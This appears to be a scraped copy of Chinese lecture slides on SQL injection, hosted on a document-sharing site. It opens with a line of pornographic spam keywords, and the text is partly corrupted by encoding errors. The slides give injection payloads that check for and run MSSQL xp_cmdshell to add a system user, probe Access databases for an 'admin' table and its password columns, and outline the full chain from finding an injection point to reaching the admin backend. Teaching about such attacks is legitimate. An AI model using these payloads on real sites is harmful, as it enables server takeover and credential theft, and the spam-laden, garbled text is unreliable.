freepeople性欧美熟妇, 色戒完整版无删减158分钟hd, 无码精品国产vα在线观看DVD, 丰满少妇伦精品无码专区在线观看,艾栗栗与纹身男宾馆3p50分钟,国产AV片在线观看,黑人与美女高潮,18岁女RAPPERDISSSUBS,国产手机在机看影片

正文內(nèi)容

網(wǎng)絡(luò)安全第六講數(shù)據(jù)庫(kù)安全實(shí)例-sql注入-資料下載頁(yè)

2025-02-08 11:19本頁(yè)面
  

【正文】 SS則兩條都會(huì)異常。 確定 XP_CMDSHELL執(zhí)行情況 and 1=(SELECT count(*) FROM WHERE xtype = 39。X39。 AND name = 39。xp_cmdshell39。) 判斷 XP_CMDSHELL是否存在 ,返回正常則存在 . exec master..xp_cmdshell’ user 123 123/add’。 ? 增加一個(gè)用戶 123,密碼也為 123,此處可使用任何 NET命令。 ? 注:此處注射必須要在 Mssql下有 SA權(quán)限 ,所以一旦成功可以直取服務(wù)器最高權(quán)限,丌過(guò)成功率很低 . 猜解表名和字段名 ? 針對(duì) Access數(shù)據(jù)庫(kù) ….?id=YY and 0(select count(*) from admin) 判斷是否存在 admin這張表 ….?id=YY and 0(select count(username) from admin) 判斷是否存在 username這個(gè)字段 ….?id=YY and 0(select count(password) from admin) 判斷是否存在 password這個(gè)字段 注意: 如果上面兩條注入語(yǔ)句返回正常就說(shuō)明存在表名和字段名 ,否則根 據(jù)常用表名和字段名多次更改和判斷 ,這里叧能憑借猜解運(yùn)氣 . 常用表名和字段名在明小子 —SQL注入 —設(shè)置檢測(cè)區(qū)中可以找到 實(shí)驗(yàn) : ? IIS+ASP+ACCESS 某站點(diǎn) SQL注射 DEMO 本講總結(jié) ? 網(wǎng)站的組成 IIS + asp + acess IIS + asp + mssql ? SQL注射的基本原理 攻擊者從客戶端提交特殊的數(shù)據(jù)庫(kù)查詢代碼,使數(shù)據(jù)庫(kù)泄露敏感信息 . ? 工具及手工注射的方法 判斷注射點(diǎn) —判斷數(shù)據(jù)庫(kù)類型 —猜解表名和列名 —得出字段值 —找后臺(tái) 手工注射工具 :明小子的使用方法 實(shí)驗(yàn) ? IIS+ASP+ACCESS(某站點(diǎn) ) IIS+ASP+ACCESS CLIENT WEB SERVER 演講完畢,謝謝觀看!
點(diǎn)擊復(fù)制文檔內(nèi)容
教學(xué)課件相關(guān)推薦
文庫(kù)吧 www.dybbs8.com
備案圖鄂ICP備17016276號(hào)-1